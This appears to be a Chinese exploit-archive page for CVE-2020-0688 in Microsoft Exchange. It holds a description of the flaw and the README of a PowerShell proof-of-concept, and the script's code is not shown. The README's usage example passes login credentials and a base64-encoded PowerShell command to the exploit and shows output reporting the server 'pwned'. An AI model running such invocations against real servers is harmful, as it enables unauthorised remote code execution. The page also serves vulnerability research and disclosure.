关联漏洞
标题:
Microsoft Exchange Server 授权问题漏洞
(CVE-2020-0688)
描述:Microsoft Exchange Server是美国微软(Microsoft)公司的一套电子邮件服务程序。它提供邮件存取、储存、转发,语音邮件,邮件过滤筛选等功能。 Microsoft Exchange Server 中存在授权问题漏洞,该漏洞源于程序无法正确处理内存中的对象。攻击者可借助特制的电子邮件利用该漏洞在系统用户的上下文中运行任意代码。以下产品及版本受到影响:Microsoft Exchange Server 2010,Microsoft Exchange Server 2013,Micro
描述
PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell
介绍
# PSForgot2kEyXCHANGE
PoC for Forgot2kEyXCHANGE (CVE-2020-0688) written in PowerShell
## Usage
This PoC requires a valid Username and Password.
This PoC uses [ysoserial.net](https://github.com/pwntester/ysoserial.net) to create the new ViewState which contains the command you specified on the -Command param.
If you don't already have this installed on your system download it [here](https://github.com/pwntester/ysoserial.net).
```PowerShell
PS> . .\PSForgot2kEyXCHANGE.ps1
PS> Invoke-Forgot2kEyXCHANG -Server 'https://webmail.domain.tld' -User 'Steve.McGreeve@domain.tld' -Password 'Summer2020!' -Command 'cmd /c powershell.exe -en dwByAGkAdABlAC0AaABvAHMAdAAgACcASQAnAG0AIABhACAAcwB0AGkAbgBrAHkAIABzAGsAaQBkACAAdwBoAG8AIAByAHUAbgBzACAAcgBhAG4AZABvAG0AIABjAG8AZABlACAAOgApACcA=' -YsoserialPath 'C:\tools\ysoserial.net\ysoserial.exe'
[+] Login successfully!
[+] Generated new ViewState successfully!
[+] Got a 500 response, successfully pwned https://webmail.domain.tld !
```
# Contributing
Feel free to open issues, contribute and submit your Pull Requests. You can also ping me on Twitter (@JustinPerdok)
文件快照
[4.0K] /data/pocs/8e34b0f61289e60d9c12000edebf09fd5c5d3bf1
├── [1.0K] LICENSE.md
├── [6.9K] PSForgot2kEyXCHANGE.ps1
└── [1.1K] README.md
0 directories, 3 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。